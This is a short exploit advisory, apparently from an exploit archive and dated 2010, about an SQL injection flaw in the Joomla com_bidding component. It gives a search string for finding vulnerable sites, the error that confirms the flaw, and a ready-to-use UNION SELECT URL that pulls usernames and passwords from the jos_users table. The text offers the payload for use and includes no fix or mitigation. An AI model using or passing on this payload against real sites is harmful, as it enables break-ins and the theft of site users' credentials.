Joomla Component com_bidding SQL Injection Vulnerability
Posted on 16 March 2010
======================================================== Joomla Component com_bidding SQL Injection Vulnerability ======================================================== # Searching = "option=com_bidding" ==> http://www.site.com/index.php?option=com_bidding&id=200' <=[SQLi]-- # error = "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result" ==> Exploiting = http://www.site.com/index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2, concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users-- # ~ - [ [ : Inj3ct0r : ] ]